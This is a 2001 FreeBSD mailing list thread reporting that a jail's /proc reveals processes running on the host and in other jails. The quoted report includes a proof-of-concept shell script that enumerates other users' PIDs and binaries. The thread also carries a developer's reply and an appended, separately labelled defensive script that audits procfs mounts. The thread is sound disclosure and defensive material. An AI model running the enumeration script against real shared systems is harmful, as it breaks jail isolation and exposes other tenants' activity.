Date: Tue, 30 Oct 2001 17:01:16 -0500 (EST)
From: Robert Watson
To: opr
Cc: freebsd-hackers@freebsd.org
Subject: Re: jail's /proc
In-Reply-To: <20011029183626.36f8e686.opr@bsdaemon.be>

This is fixed in 5.0-CURRENT, but the architectural improvements to
support the fix have not been merged, since they're still in flux. My
general advice is to not mount procfs on systems with untrusted users.
It's almost possible to not lose functionality in doing that -- I
understand DES has patches to truss to make it use ptrace(), which is the
last remaining instance I can think of. (Actually, I think ps -e requires
procfs still.)

Robert N M Watson             FreeBSD Core Team, TrustedBSD Project
robert@fledge.watson.org      NAI Labs, Safeport Network Services

On Mon, 29 Oct 2001, opr wrote:

>
> Hello,
>
> I really have no clue if I should mail this to you guys, but we've found
> some issues in the jail's /proc. We were able to find information about
> processes running outside the jail, or running in other jails.
> E.g. when I run sshd in the host system, and it has PID 655, I can log in
> on the jail, and by executing "ls -l /proc/665/file" I can see what binary
> is running on PID 655. So any user of the jail system can see what
> processes you run on that server. I'm running FreeBSD 4.4-RELEASE on an
> i386.
>
> greetz,
>
> Pieter Danhieux
>
> Proof of concept shellscript:
>
> #!/bin/sh
> # Walk the PID space and report every process visible through /proc.
> _COUNT=0;
> while [ $_COUNT -le 65000 ];
> do
>   if [ -f /proc/$_COUNT/file ];
>   then
>     # Owner and target binary, taken from the "ls -l" output.
>     _USER=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f4`;
>     _PROC=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f14`;
>     echo "PID= $_COUNT USER= $_USER PROC= $_PROC";
>   fi
>   _COUNT=`expr $_COUNT + 1`;
> done
>
> -----------------
> [www.bsdaemon.be]
> -----------------
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message
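
Added example, not part of the original thread: one way to act on the advice above is to audit where procfs is mounted, by scanning fstab(5)-format text such as /etc/fstab or the output of "mount -p" on FreeBSD. The function names, the sample entries and the jail root /usr/jail are assumptions made for illustration.

```sh
#!/bin/sh
# Added example (not from the thread): find procfs mounts in fstab(5)-format
# text, e.g. /etc/fstab or the output of "mount -p" on FreeBSD.

# Print the mount point of every entry whose filesystem type is procfs.
list_procfs_mounts() {
    awk '$1 ~ /^#/ { next }                  # skip comment lines
         NF >= 3 && $3 == "procfs" { print $2 }'
}

# Tag each procfs mount point as "jail" if it lies under the jail root given
# as $1, otherwise as "host".
classify_procfs_mounts() {
    jail_root=${1%/}
    list_procfs_mounts | while IFS= read -r mp; do
        case "$mp" in
            "$jail_root"/*) echo "jail $mp" ;;
            *)              echo "host $mp" ;;
        esac
    done
}

# Return 1 and print the findings if any procfs mount exists, else return 0.
audit_procfs() {
    found=$(classify_procfs_mounts "$1")
    if [ -z "$found" ]; then
        return 0
    fi
    printf '%s\n' "$found"
    return 1
}

# Constructed sample input; /usr/jail is an assumed jail root.
sample_fstab() {
    cat <<'EOF'
# Device      Mountpoint           FStype  Options  Dump  Pass#
/dev/ad0s1a   /                    ufs     rw       1     1
/dev/ad0s1f   /usr/jail            ufs     rw       2     2
procfs        /proc                procfs  rw       0     0
procfs        /usr/jail/www/proc   procfs  rw       0     0
EOF
}

# Demo run on the sample: prints "host /proc" and "jail /usr/jail/www/proc".
sample_fstab | classify_procfs_mounts /usr/jail
```

On a live host the same check would be fed real data, for instance "mount -p | audit_procfs /usr/jail", with the non-zero exit status usable in a periodic job.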